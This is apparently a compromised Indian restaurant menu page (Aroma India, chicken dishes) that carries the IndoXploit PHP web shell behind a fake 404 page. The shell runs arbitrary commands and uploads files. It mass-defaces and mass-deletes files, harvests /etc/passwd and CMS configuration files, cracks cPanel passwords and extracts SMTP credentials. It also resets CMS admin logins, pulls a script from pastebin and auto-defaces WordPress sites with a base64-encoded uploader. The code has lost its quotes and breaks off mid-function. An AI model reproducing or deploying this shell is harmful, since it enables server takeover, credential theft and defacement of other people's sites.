Aroma India
 
   
  Banner  
tp
  Tilgjengelige Kylling retter:

28. Chicken tikka masala

29. Chicken vindaloo

30. Chicken karahi

31. Saag chicken

32. Butter chicken

33. Chilli chicken

34. Chicken korma

 
bt
ftp
 
32. Butter chicken

404 Not Found

Not Found

The requested URL .$_SERVER[PHP_SELF]. was not found on this server.


Apache .phpversion(). Server at .$_SERVER[SERVER_NAME]. Port 80
; if($_POST[Passalt7]){ $cek = cek_key($_POST[Passalt7],$s_pass,"login"); if($cek){ $_SESSION["login"]=$_POST[Passalt7]; header(Location: ?); } } }else{ ?> IndoXploit ".$perm."
"; } else { return "".$perm.""; } } function exe($cmd) { if(function_exists(system)) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(exec)) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists(passthru)) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(shell_exec)) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = s; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = l; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = -; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = b; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = d; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = c; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = p; } else { // Unknown $info = u; } // Owner $info .= (($perms & 0x0100) ? r : -); $info .= (($perms & 0x0080) ? w : -); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? s : x ) : (($perms & 0x0800) ? S : -)); // Group $info .= (($perms & 0x0020) ? r : -); $info .= (($perms & 0x0010) ? w : -); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? s : x ) : (($perms & 0x0400) ? S : -)); // World $info .= (($perms & 0x0004) ? r : -); $info .= (($perms & 0x0002) ? w : -); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? t : x ) : (($perms & 0x0200) ? T : -)); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf(%1.2f,$s / 1073741824 ). GB; elseif($s >= 1048576) return sprintf(%1.2f,$s / 1048576 ) . MB; elseif($s >= 1024) return sprintf(%1.2f,$s / 1024 ) . KB; else return $s . B; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } if(get_magic_quotes_gpc()) { function idx_ss($array) { return is_array($array) ? array_map(idx_ss, $array) : stripslashes($array); } $_POST = idx_ss($_POST); } error_reporting(0); error_log(0); @ini_set(error_log,NULL); @ini_set(log_errors,0); @ini_set(max_execution_time,0); @set_time_limit(0); @set_magic_quotes_runtime(0); if(isset($_GET[dir])) { $dir = $_GET[dir]; chdir($_GET[dir]); } else { $dir = getcwd(); } $dir = str_replace("\","/",$dir); $scdir = explode("/", $dir); $sm = (@ini_get(strtolower("safe_mode")) == on) ? "ON" : "OFF"; $ds = @ini_get("disable_functions"); $mysql = (function_exists(mysql_connect)) ? "ON" : "OFF"; $curl = (function_exists(curl_version)) ? "ON" : "OFF"; $wget = (exe(wget --help)) ? "ON" : "OFF"; $perl = (exe(perl --help)) ? "ON" : "OFF"; $python = (exe(python --help)) ? "ON" : "OFF"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; if(!function_exists(posix_getegid)) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid[name]; $uid = $uid[uid]; $group = $gid[name]; $gid = $gid[gid]; } echo "System: ".php_uname()."
"; echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
"; echo "Server IP: ".gethostbyname($_SERVER[HTTP_HOST])." | Your IP: ".$_SERVER[REMOTE_ADDR]."
"; echo "HDD: ".hdd(disk_free_space("/"))." / ".hdd(disk_total_space("/"))."
"; echo "Safe Mode: $sm
"; echo "Disable Functions: $show_ds
"; echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
"; echo "Current DIR: "; foreach($scdir as $c_dir => $cdir) { echo "$cdir/"; } echo "
"; echo "
"; echo ""; echo "
"; echo "
"; if($_GET[do] == upload) { echo "
"; if($_POST[upload]) { if(@copy($_FILES[ix_file][tmp_name], "$dir/".$_FILES[ix_file][name]."")) { $act = "Uploaded! at $dir/".$_FILES[ix_file][name].""; } else { $act = "failed to upload file"; } } echo "Upload File: [ ".w($dir,"Writeable")." ]
"; echo $act; echo "
"; } elseif($_GET[do] == cmd) { echo "
".$user."@".gethostbyname($_SERVER[HTTP_HOST]).":~# >>
"; if($_POST[do_cmd]) { echo "
".exe($_POST[cmd])."
"; } } elseif($_GET[do] == mass_deface) { function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc./.$namafile; if($dirb === .) { file_put_contents($lokasi, $isi_script); } elseif($dirb === ..) { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc./.$namafile; if($dirb === .) { file_put_contents($lokasi, $isi_script); } elseif($dirb === ..) { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST[start]) { if($_POST[tipe_sabun] == mahal) { echo "
"; sabun_massal($_POST[d_dir], $_POST[d_file], $_POST[script]); echo "
"; } elseif($_POST[tipe_sabun] == murah) { echo "
"; sabun_biasa($_POST[d_dir], $_POST[d_file], $_POST[script]); echo "
"; } } else { echo "
"; echo "
Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:

"; } } elseif($_GET[do] == mass_delete) { function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc./.$namafile; if($dirb === .) { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === ..) { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST[start]) { echo "
"; hapus_massal($_POST[d_dir], $_POST[d_file]); echo "
"; } else { echo "
"; echo "
Folder:

Filename:

"; } } elseif($_GET[do] == config) { $etc = fopen("/etc/passwd", "r"); $idx = mkdir("idx_config", 0777); $isi_htc = "Options all Require None Satisfy Any"; $htc = fopen("idx_config/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "Cant read /etc/passwd"; } else { preg_match_all(/(.*?):x:/, $passwd, $user_config); foreach($user_config[1] as $user_idx) { $user_config_dir = "/home/$user_idx/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_idx/.my.cnf" => "cpanel", "/home/$user_idx/.accesshash" => "WHM-accesshash", "/home/$user_idx/public_html/vdo_config.php" => "Voodoo", "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_idx/public_html/forum/config.php" => "phpBB", "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal", "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_idx/public_html/app/etc/local.xml" => "Magento", "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla", "/home/$user_idx/public_html/configuration.php" => "Joomla", "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wp-config.php" => "WordPress", "/home/$user_idx/public_html/admin/config.php" => "OpenCart", "/home/$user_idx/public_html/slconfig.php" => "Sitelok", "/home/$user_idx/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == ) { } else { $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo "
Done
"; } elseif($_GET[do] == jumping) { $i = 0; echo "
"; $etc = fopen("/etc/passwd", "r"); while($passwd = fgets($etc)) { if($passwd == || !$etc) { echo "Cant read /etc/passwd"; } else { preg_match_all(/(.*?):x:/, $passwd, $user_jumping); foreach($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $jrw = "[R] $user_jumping_dir"; if(is_writable($user_jumping_dir)) { $jrw = "[RW] $user_jumping_dir"; } echo $jrw; if(function_exists(posix_getpwuid)) { $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == ) { echo " => ( gabisa ambil nama domain nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url[name]; if($user_jumping_url == $user_idx_jump) { echo " => ( $dj )
"; break; } } } } else { echo "
"; } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".gethostbyname($_SERVER[HTTP_HOST]).""; } echo "
"; } elseif($_GET[do] == auto_edit_user) { if($_POST[hajar]) { if(strlen($_POST[pass_baru]) < 6 OR strlen($_POST[user_baru]) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST[user_baru]; $pass_baru = md5($_POST[pass_baru]); $conf = $_POST[config_dir]; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = ",""); $dbuser = ambilkata($config,"user = ",""); $dbpass = ambilkata($config,"password = ",""); $dbname = ambilkata($config,"db = ",""); $dbprefix = ambilkata($config,"dbprefix = ",""); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[id]; $site = ambilkata($config,"sitename = ",""); $update = mysql_query("UPDATE $prefix SET username=$user_baru,password=$pass_baru WHERE id=$id"); echo "Config => ".$file_conf."
"; echo "CMS => Joomla
"; if($site == ) { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST, ",""); $dbuser = ambilkata($config,"DB_USER, ",""); $dbpass = ambilkata($config,"DB_PASSWORD, ",""); $dbname = ambilkata($config,"DB_NAME, ",""); $dbprefix = ambilkata($config,"table_prefix = ",""); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == ) { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login=$user_baru,user_pass=$pass_baru WHERE id=$id"); echo "Config => ".$file_conf."
"; echo "CMS => Wordpress
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,""); $dbuser = ambilkata($config,""); $dbpass = ambilkata($config,""); $dbname = ambilkata($config,""); $dbprefix = ambilkata($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path=web/secure/base_url"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == ) { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username=$user_baru,password=$pass_baru WHERE user_id=$id"); echo "Config => ".$file_conf."
"; echo "CMS => Magento
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"DB_HOSTNAME, ",""); $dbuser = ambilkata($config,"DB_USERNAME, ",""); $dbpass = ambilkata($config,"DB_PASSWORD, ",""); $dbname = ambilkata($config,"DB_DATABASE, ",""); $dbprefix = ambilkata($config,"DB_PREFIX, ",""); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER, ",""); if($target == ) { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username=$user_baru,password=$pass_baru WHERE user_id=$id"); echo "Config => ".$file_conf."
"; echo "CMS => OpenCart
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,server = ","); $dbuser = ambilkata($config,username = ","); $dbpass = ambilkata($config,password = ","); $dbname = ambilkata($config,database = ","); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == ) { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa
"; if($target2 == ) { $url_target2 = "Login => error, gabisa ambil nama domain nyaa
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username=$user_baru,password=$pass_baru WHERE level=admin"); echo "Config => ".$file_conf."
"; echo "CMS => Lokomedia
"; if(preg_match(/error, gabisa ambil nama domain nya/, $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } } } } else { echo "

Auto Edit User Config

DIR Config:


Set User & Pass:


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET[do] == cpanel) { if($_POST[crack]) { $usercp = explode(" ", $_POST[user_cp]); $passcp = explode(" ", $_POST[pass_cp]); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect(localhost, $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if($ucp == || $pcp == ) { } else { $i++; echo "username ($ucp) password ($pcp)
"; } } } } } if($i == 0) { } else { echo "
sukses nyolong ".$i." Cpanel by IndoXploit."; } } else { echo "
USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET[do] == smtp) { echo "
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; function scj($dir) { $dira = scandir($dir); foreach($dira as $dirb) { if(!is_file("$dir/$dirb")) continue; $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace("$", "", $ambil); if(preg_match("/JConfig|joomla/", $ambil)) { $smtp_host = ambilkata($ambil,"smtphost = ",""); $smtp_auth = ambilkata($ambil,"smtpauth = ",""); $smtp_user = ambilkata($ambil,"smtpuser = ",""); $smtp_pass = ambilkata($ambil,"smtppass = ",""); $smtp_port = ambilkata($ambil,"smtpport = ",""); $smtp_secure = ambilkata($ambil,"smtpsecure = ",""); echo "SMTP Host: $smtp_host
"; echo "SMTP port: $smtp_port
"; echo "SMTP user: $smtp_user
"; echo "SMTP pass: $smtp_pass
"; echo "SMTP auth: $smtp_auth
"; echo "SMTP secure: $smtp_secure

"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif($_GET[do] == auto_wp) { if($_POST[hajar]) { $title = htmlspecialchars($_POST[new_title]); $pn_title = str_replace(" ", "-", $title); if($_POST[cek_edit] == "Y") { $script = $_POST[edit_content]; } else { $script = $title; } $conf = $_POST[config_dir]; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST, ",""); $dbuser = ambilkata($config,"DB_USER, ",""); $dbpass = ambilkata($config,"DB_PASSWORD, ",""); $dbname = ambilkata($config,"DB_NAME, ",""); $dbprefix = ambilkata($config,"table_prefix = ",""); $prefix = $dbprefix."posts"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE $prefix SET post_title=$title,post_content=$script,post_name=$pn_title,post_status=publish,comment_status=open,ping_status=open,post_type=post,comment_count=1 WHERE id=$id"); $update .= mysql_query("UPDATE $option SET option_value=$title WHERE option_name=blogname OR option_name=blogdescription"); echo "
"; if($target == ) { echo "URL: error, gabisa ambil nama domain nya -> "; } else { echo "URL: $target/?p=$id -> "; } if(!$update OR !$conn OR !$db) { echo "MySQL Error: ".mysql_error()."
"; } else { echo "sukses di ganti.
"; } echo "
"; mysql_close($conn); } } } else { echo "

Auto Edit Title+Content WordPress

DIR Config:


Set Title:


Edit Content?: YN
Jika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET[do] == zoneh) { if($_POST[submit]) { $domain = explode(" ", $_POST[url]); $nick = $_POST[nick]; echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
"; echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

"; function zoneh($url,$nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach($domain as $url) { $zoneh = zoneh($url,$nick); if(preg_match("/color="red">OK/i", $zoneh)) { echo "$url -> OK
"; } else { echo "$url -> ERROR
"; } } } else { echo "
Defacer:

Domains:

"; } echo "
"; } elseif($_GET[do] == cgi) { $cgi_dir = mkdir(idx_cgi, 0755); $file_cgi = "idx_cgi/cgi.izo"; $isi_htcgi = "AddHandler cgi-script .izo"; $htcgi = fopen(".htaccess", "w"); $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg"); $cgi = fopen($file_cgi, "w"); fwrite($cgi, $cgi_script); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); echo ""; } elseif($_GET[do] == fake_root) { ob_start(); function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("""","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("","", str_replace("","", str_replace(":",",", str_replace(",, $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); foreach($array as $lnk) { $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo $lnk." "; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if($_POST[reverse]) { $site = explode(" ", $_POST[url]); $file = $_POST[file]; foreach($site as $url) { $cek = cek("$url/~$user/$file"); if(preg_match("/hacked/i", $cek)) { echo "URL: $url/~$user/$file -> Fake Root!
"; } } } else { echo "
Filename:

User:

Domain:


NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
"; } } elseif($_GET[do] == adminer) { $full = str_replace($_SERVER[DOCUMENT_ROOT], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists(adminer.php)) { echo "
-> adminer login <-
"; } else { if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { echo "
-> adminer login <-
"; } else { echo "
gagal buat file adminer
"; } } } elseif($_GET[do] == auto_dwp) { if($_POST[auto_deface_wp]) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,cookie.txt); curl_setopt($ch, CURLOPT_COOKIEFILE,cookie.txt); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,cookie.txt); curl_setopt($ch, CURLOPT_COOKIEFILE,cookie.txt); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $scan = $_POST[link_config]; $link_config = scandir($scan); $script = htmlspecialchars($_POST[script]); $user = "indoxploit"; $pass = "indoxploit"; $passx = md5($pass); foreach($link_config as $dir_config) { if(!is_file("$scan/$dir_config")) continue; $config = file_get_contents("$scan/$dir_config"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST, ",""); $dbuser = ambilkata($config,"DB_USER, ",""); $dbpass = ambilkata($config,"DB_PASSWORD, ",""); $dbname = ambilkata($config,"DB_NAME, ",""); $dbprefix = ambilkata($config,"table_prefix = ",""); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == ) { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login=$user,user_pass=$passx WHERE ID=$id"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id="wp-submit" class="button button-primary button-large" value="","" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name="_wpnonce" value="","" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,cookie.txt); curl_setopt($ch, CURLOPT_COOKIEFILE,cookie.txt); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array(file3=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,cookie.txt); curl_setopt($ch6, CURLOPT_COOKIESESSION, true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); 